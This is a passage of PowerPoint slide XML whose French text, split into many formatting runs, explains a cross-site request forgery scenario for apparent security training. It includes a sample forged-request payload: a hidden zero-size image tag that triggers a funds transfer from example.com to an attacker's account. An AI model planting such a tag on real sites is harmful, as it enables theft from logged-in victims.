                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’impact</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>votre</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>réputation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</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732240"/>
            <a:ext cx="3429000" cy="241176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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scénario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>soumettre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>changement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> d’état, qui ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requiert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aucun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> secret : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/transferFunds?amount=1500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>destinationAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=4673243243</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>donc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> forger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transférer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’argent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sur son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>propre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, et la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cacher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>balise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> image, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>balise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stockée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sur un site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contrôle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/transferFunds?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  amount=1500&amp;destinationAccount=attackersAcct#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  width="0" height="0" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Si la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’un</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des sites de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qu’elle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toujours</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentifiée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sur le site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>navigateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inclura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les données de session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
